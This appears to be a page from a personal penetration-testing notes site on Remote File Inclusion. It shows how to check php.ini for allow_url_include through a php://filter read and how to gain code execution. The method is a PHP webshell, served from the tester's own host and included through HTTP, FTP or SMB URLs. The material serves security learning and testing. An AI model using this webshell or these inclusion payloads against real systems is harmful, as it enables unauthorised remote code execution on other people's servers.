πŸ““
Sfoffo - Pentesting Notes
View on GitHub
  • 🏠/home/sfoffo/.pt-notes
  • 🏳️Contributions
    • 2024 Contributions
      • CVE-2024-42845
      • CVE-2024-41819
      • CVE-2024-41943
      • CVE-2024-50344
  • πŸ€Support this Project
  • πŸ“‚Active Directory
    • Initial Access
    • Internal Enumeration & Lateral Movement
    • Privilege Escalation to Domain Admin using Known Exploits
    • Domain Trusts
  • 🐧Linux Privilege Escalation
    • Enumerating Attack Vectors
    • Privileged Groups
    • Environment Variables Abuse
    • Capabilities Abuse
    • Programs, Jobs and Services
    • Miscellaneous Techniques
    • Recent CVEs
  • πŸͺŸWindows Privilege Escalation
    • Enumerating Attack Vectors
    • Excessive User Rights Abuse
    • Built-in Groups Abuse
    • File System ACLs
    • Services Hijacking
    • User Account Control (UAC) Bypass
    • Living off the Land
  • πŸ›Bug Bounty Hunting
    • Bug Bounty Tools
  • πŸ•ΈοΈWeb Applications
    • Web Attacks
      • Cross Site Scripting (XSS)
      • SQL Injection (SQLi)
      • File Upload Vulnerabilities
      • Insecure Direct Object References (IDOR)
      • OS Command Injection
      • Local File Inclusion (LFI)
      • Remote File Inclusion (RFI)
      • XML External Entities (XXE)
      • HTTP Verb Tampering
    • Web Technologies
      • Tomcat
      • CGI Applications
      • WordPress
      • WebDav
      • Microsoft IIS
      • SAP Netweaver
      • Joomla
      • Drupal
      • Gitlab
      • Jenkins
      • osTicket
      • PRTG Network Monitor
      • Splunk
    • Fuzzing
  • πŸ”Information Gathering
  • πŸ“œProtocols and Services
    • DNS
    • FTP
    • IMAP
    • IPMI
    • MSSQL
    • MySQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • SMB
    • SMTP
    • SNMP
  • πŸ‘ΎUtilities, Scripts and Payloads
    • Shells and Payloads
    • Metasploit Framework
    • File Transfers
    • Pivoting, Tunneling, Port Forwarding
    • Password Attacks
Powered by GitBook
On this page
  • Introduction
  • Enumerate RFI Vulnerabilities
  • Remote Code Execution from RFI

Was this helpful?

Edit on GitHub
  1. Web Applications
  2. Web Attacks

Remote File Inclusion (RFI)

Introduction

  • RFI is basically an LFI which also allows inclusion of remote URLs in order to include remote files

  • The objectives are to enumerate local ports and web application through SSRF vulnerabilities or Gaining RCE by **including a malicious script that we host on our server **

  • Almost any RFI vulnerability is also an LFI vulnerability (by including a local URL rather than a remote URL)


Enumerate RFI Vulnerabilities

  1. Check if allow_url_include is enabled:

    • To do so, you need to read the PHP configuration file found at

    • (/etc/php/X.Y/apache2/php.ini) for Apache

    • (/etc/php/X.Y/fpm/php.ini) for Nginx,

    • where X.Y is your install PHP version

  2. Read the PHP Configuration File using the base64 filter (to ensure everything is read properly)

    • curl "http://<SERVER_IP>:<PORT>/index.php?language=php://filter/read=convert.base64-encode/resource=../../../../etc/php/7.4/apache2/php.ini"

  3. Check if the option is set to ON: echo 'BASE64VALUE' | base64 -d | grep allow_url_include

  4. This may not always be reliable, as even if this setting is enabled, the vulnerable function may not allow remote URL inclusion to begin with.

  5. Try to include a URL, starting with a local url like http://127.0.0.1:80/index.php then, if that works, include a remote URL


Remote Code Execution from RFI

Follow these steps:

  1. Write the webshell payload file: echo '<?php system($_GET["cmd"]); ?>' > shell.php

  2. Start a webserver: sudo python3 -m http.server <LISTENING_PORT>

  3. Use RFI to gain RCE: http://<SERVER_IP>:<PORT>/index.php?language=http://<OUR_IP>:<LISTENING_PORT>/shell.php&cmd=id

  4. The same thing can be done by starting a local FTP or SMB server and using ftp://<OUR_IP>/shell.php&cmd=id or \\<OUR_IP>\share\shell.php

Last updated 1 year ago

Was this helpful?

πŸ•ΈοΈ